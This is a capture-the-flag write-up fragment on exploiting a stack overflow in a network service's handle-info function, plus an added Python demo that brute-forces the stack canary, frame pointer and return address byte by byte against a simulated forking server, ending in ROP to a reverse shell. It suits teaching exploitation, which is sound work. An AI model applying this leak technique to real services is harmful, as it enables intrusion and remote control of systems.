The solution is similar to the one for CVE-2018-1160 (Netatalk) and to Metatalk from Hitcon 2021.

1. Read the source code and find the vulnerabilities.

2. I found two vulnerabilities in the function handle-info: one heap overflow and one stack overflow.

3. The heap overflow is hard to use, because the heap feng shui has to be constructed carefully.

4. The stack overflow is easy to use: we can get the PIE, heap and canary values by observing the state of the connection after each probe (crash or hang).

5. ROP to get a reverse shell. Exp:
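The crash-or-hang leak from step 4, written out as an added example; this is not code from the original writeup or its exploit. A constructed forking service stands in for the real target: it assumes a 64-byte stack buffer in a hypothetical handle_info followed by canary, saved frame pointer and return address, and it assumes that every overwritten byte that differs from the original kills the child (connection dropped, "crash"), while a probe that rewrites each byte with its true value lets the handler continue ("hang"). The leak works because a forking server reuses the parent's canary and addresses for every connection, so each byte can be brute-forced independently with at most 256 connections.

```python
import os
import struct

# Assumed layout (not taken from the original exploit): the overflowed stack
# buffer in handle_info is BUF_SIZE bytes, followed by canary, saved rbp and
# return address.
BUF_SIZE = 64
STACK_TAIL = 8 * 3  # canary + saved frame pointer + return address


class SimulatedForkServer:
    """Constructed stand-in for a forking network service with a stack overflow.

    Every connection is served by a fork of the same parent, so the canary and
    the stack/heap/PIE addresses are identical across connections. A probe that
    overwrites a byte with the wrong value kills the child ("crash"); a probe
    that rewrites every byte with its original value keeps the handler running
    and the connection open ("hang").
    """

    def __init__(self, canary=None, saved_rbp=None, ret_addr=None):
        # glibc x86-64 canaries have a 0x00 low byte; user addresses are 48-bit.
        if canary is None:
            canary = int.from_bytes(b"\x00" + os.urandom(7), "little")
        if saved_rbp is None:
            saved_rbp = 0x7FFC00000000 | int.from_bytes(os.urandom(4), "little")
        if ret_addr is None:
            ret_addr = 0x555555554000 | int.from_bytes(os.urandom(2), "little")
        self.canary, self.saved_rbp, self.ret_addr = canary, saved_rbp, ret_addr
        self._tail = struct.pack("<QQQ", canary, saved_rbp, ret_addr)
        self.connections = 0  # one connection per probe

    def handle_info(self, payload: bytes) -> str:
        """Return what the client observes for one connection: "crash" or "hang"."""
        self.connections += 1
        overflow = payload[BUF_SIZE:]
        if len(overflow) > STACK_TAIL:
            return "crash"
        # Model assumption: any changed byte past the buffer kills the child.
        return "hang" if overflow == self._tail[: len(overflow)] else "crash"


def leak_stack_bytes(oracle, known: bytes, count: int) -> bytes:
    """Recover `count` bytes that follow `known` on the stack, byte by byte.

    `oracle(payload)` sends one connection and returns "crash" or "hang". For
    each position all 256 values are tried; the value that keeps the
    connection alive is the original byte, because that overwrite was harmless.
    """
    leaked = bytearray(known)
    for _ in range(count):
        for guess in range(256):
            probe = b"A" * BUF_SIZE + bytes(leaked) + bytes([guess])
            if oracle(probe) == "hang":
                leaked.append(guess)
                break
        else:
            # No value survived: the layout or the crash/hang assumption is wrong.
            raise RuntimeError("no byte kept the connection alive at offset %d" % len(leaked))
    return bytes(leaked[len(known):])


def leak_all(oracle) -> dict:
    """Leak canary, saved frame pointer and return address, in stack order."""
    canary = leak_stack_bytes(oracle, b"", 8)
    saved_rbp = leak_stack_bytes(oracle, canary, 8)
    ret_addr = leak_stack_bytes(oracle, canary + saved_rbp, 8)
    return {
        "canary": struct.unpack("<Q", canary)[0],
        "saved_rbp": struct.unpack("<Q", saved_rbp)[0],
        "ret_addr": struct.unpack("<Q", ret_addr)[0],
    }


def pie_base(ret_addr: int, ret_site_offset: int) -> int:
    """PIE base = leaked return address minus the call site's offset in the
    binary (the offset comes from disassembling the target; it is an input here)."""
    return ret_addr - ret_site_offset


if __name__ == "__main__":
    srv = SimulatedForkServer()
    leaked = leak_all(srv.handle_info)
    print("canary    = %#018x" % leaked["canary"])
    print("saved rbp = %#x" % leaked["saved_rbp"])
    print("ret addr  = %#x" % leaked["ret_addr"])
    print("probes    = %d (max %d)" % (srv.connections, 256 * STACK_TAIL))
```

Against a real target the oracle is a socket wrapper that returns "crash" when the connection is closed and "hang" when a read times out, and the 0x00 low byte of the canary is found on the very first probe. The caveat to keep in mind is the model's assumption that a wrong saved-rbp byte crashes the child; whether that holds depends on how the caller uses its frame pointer afterwards, so the leaked frame pointer should be sanity-checked against a plausible heap or stack range before it is trusted.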

Original writeup (https://r3kapig.com/writeup/20220125-rwctf4/#who-moved-my-block).